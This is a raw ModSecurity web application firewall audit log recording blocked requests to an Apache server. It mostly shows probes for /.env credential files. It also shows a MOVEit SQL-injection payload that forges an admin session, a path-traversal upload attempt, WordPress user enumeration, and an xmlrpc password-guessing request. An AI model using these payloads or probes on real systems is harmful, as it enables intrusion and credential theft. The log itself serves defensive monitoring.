Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749066970049061 836 (- - -) Stopwatch2: 1749066970049061 836; combined=345, p1=305, p2=0, p3=0, p4=0, p5=40, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22aa7c61-Z-- --7f9b2f65-A-- [05/Jun/2025:03:04:50 +0700] aECm4l_DvM40jZomoktixgAAAAM 103.236.140.4 41880 103.236.140.4 8181 --7f9b2f65-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 167.99.210.137 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --7f9b2f65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f9b2f65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749067490032734 811 (- - -) Stopwatch2: 1749067490032734 811; combined=292, p1=266, p2=0, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f9b2f65-Z-- --2d5e5131-A-- [05/Jun/2025:03:33:36 +0700] aECtoFwdJdhOudw5hdzIfQAAAIA 103.236.140.4 42170 103.236.140.4 8181 --2d5e5131-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; LM-Q925S) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --2d5e5131-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d5e5131-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749069216842000 668 (- - -) Stopwatch2: 1749069216842000 668; combined=232, p1=205, p2=0, p3=0, p4=0, p5=26, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d5e5131-Z-- --73712259-A-- [05/Jun/2025:03:37:52 +0700] aECuoCrHpfaS2Cuwh8XOJAAAAFE 103.236.140.4 42176 103.236.140.4 8181 --73712259-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 Accept-Charset: utf-8 --73712259-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73712259-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749069472077277 906 (- - -) Stopwatch2: 1749069472077277 906; combined=372, p1=331, p2=0, p3=0, p4=0, p5=41, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73712259-Z-- --0a855648-A-- [05/Jun/2025:04:18:49 +0700] aEC4Oeth7G2xELALzPYZ8AAAANU 103.236.140.4 42404 103.236.140.4 8181 --0a855648-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.176.55 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.176.55 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --0a855648-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a855648-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749071929662659 692 (- - -) Stopwatch2: 1749071929662659 692; combined=289, p1=257, p2=0, p3=0, p4=0, p5=32, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a855648-Z-- --d5255956-A-- [05/Jun/2025:04:46:33 +0700] aEC-uSrHpfaS2Cuwh8XOZAAAAEM 103.236.140.4 42602 103.236.140.4 8181 --d5255956-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 143.244.168.161 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 143.244.168.161 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --d5255956-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5255956-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749073593773125 783 (- - -) Stopwatch2: 1749073593773125 783; combined=346, p1=312, p2=0, p3=0, p4=0, p5=34, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5255956-Z-- --6f6d705d-A-- [05/Jun/2025:07:05:48 +0700] aEDfXOth7G2xELALzPYaywAAAME 103.236.140.4 44958 103.236.140.4 8181 --6f6d705d-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; JSN-AL00a Build/HONORJSN-AL00a; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/1961 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --6f6d705d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f6d705d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749081948877233 932 (- - -) Stopwatch2: 1749081948877233 932; combined=408, p1=368, p2=0, p3=0, p4=0, p5=39, sr=153, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f6d705d-Z-- --cd0e6076-A-- [05/Jun/2025:07:12:09 +0700] aEDg2eth7G2xELALzPYa0AAAAMs 103.236.140.4 44982 103.236.140.4 8181 --cd0e6076-B-- GET /shop/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept-Charset: utf-8 --cd0e6076-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd0e6076-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749082329910498 784 (- - -) Stopwatch2: 1749082329910498 784; combined=324, p1=283, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd0e6076-Z-- --317c0b16-A-- [05/Jun/2025:07:24:06 +0700] aEDjpirHpfaS2Cuwh8XPBgAAAFM 103.236.140.4 45060 103.236.140.4 8181 --317c0b16-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.90.185.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.90.185.109 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --317c0b16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --317c0b16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749083046018937 3129 (- - -) Stopwatch2: 1749083046018937 3129; combined=1359, p1=512, p2=817, p3=0, p4=0, p5=29, sr=147, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --317c0b16-Z-- --d7c69e39-A-- [05/Jun/2025:08:38:06 +0700] aED0_irHpfaS2Cuwh8XQUAAAAEc 103.236.140.4 49704 103.236.140.4 8181 --d7c69e39-B-- POST /userentry?accountId=/../../../tomcat/webapps/Zm79I/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 124 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173802494 --d7c69e39-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --d7c69e39-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7c69e39-E-- --d7c69e39-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749087486680449 4638 (- - -) Stopwatch2: 1749087486680449 4638; combined=2653, p1=510, p2=2109, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7c69e39-Z-- --10c14874-A-- [05/Jun/2025:09:39:40 +0700] aEEDbOth7G2xELALzPYfZAAAANQ 103.236.140.4 59406 103.236.140.4 8181 --10c14874-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.176.55 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.176.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --10c14874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10c14874-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749091180426862 778 (- - -) Stopwatch2: 1749091180426862 778; combined=315, p1=277, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10c14874-Z-- --256f7b69-A-- [05/Jun/2025:10:00:20 +0700] aEEIRFwdJdhOudw5hdzN5AAAAIY 103.236.140.4 32778 103.236.140.4 8181 --256f7b69-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 0 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=hoq0cmn7l5ork6n0pe0ltt5ej0 X-Varnish: 173658387 --256f7b69-C-- --256f7b69-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --256f7b69-E-- --256f7b69-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749092420690890 3259 (- - -) Stopwatch2: 1749092420690890 3259; combined=1538, p1=456, p2=1052, p3=0, p4=0, p5=30, sr=92, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --256f7b69-Z-- --68aad30c-A-- [05/Jun/2025:10:00:32 +0700] aEEIUCrHpfaS2Cuwh8XTbwAAAFI 103.236.140.4 32794 103.236.140.4 8181 --68aad30c-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xxRNEzNwXI0bzeiwv5DSRNFYJz');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE 
SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=hoq0cmn7l5ork6n0pe0ltt5ej0 X-Varnish: 173658393 --68aad30c-C-- --68aad30c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68aad30c-E-- --68aad30c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749092432684828 3215 (- - -) Stopwatch2: 1749092432684828 3215; combined=1615, p1=475, p2=1110, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68aad30c-Z-- --45c24f0b-A-- [05/Jun/2025:10:07:24 +0700] aEEJ7Oth7G2xELALzPYf_wAAANU 103.236.140.4 32936 103.236.140.4 8181 --45c24f0b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.233 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.233 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --45c24f0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45c24f0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749092844454041 794 (- - -) Stopwatch2: 1749092844454041 794; combined=366, p1=331, p2=0, p3=0, p4=0, p5=34, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45c24f0b-Z-- --5c0b7a6e-A-- [05/Jun/2025:10:07:51 +0700] aEEKByrHpfaS2Cuwh8XTigAAAEA 103.236.140.4 32960 103.236.140.4 8181 --5c0b7a6e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.233 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.233 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5c0b7a6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c0b7a6e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749092871574179 940 (- - -) Stopwatch2: 1749092871574179 940; combined=393, p1=352, p2=0, p3=0, p4=0, p5=41, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c0b7a6e-Z-- --1c1a7f30-A-- [05/Jun/2025:10:55:42 +0700] aEEVPn-K7ToMdu-YSIIjWAAAABg 103.236.140.4 33728 103.236.140.4 8181 --1c1a7f30-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Accept-Charset: utf-8 --1c1a7f30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c1a7f30-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749095742566938 823 (- - -) Stopwatch2: 1749095742566938 823; combined=345, p1=306, p2=0, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c1a7f30-Z-- --4746ac4a-A-- [05/Jun/2025:11:49:19 +0700] aEEhzyrHpfaS2Cuwh8XTwAAAAFU 103.236.140.4 34598 103.236.140.4 8181 --4746ac4a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.146.234.58 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.146.234.58 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4746ac4a-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh123* --4746ac4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4746ac4a-E-- --4746ac4a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
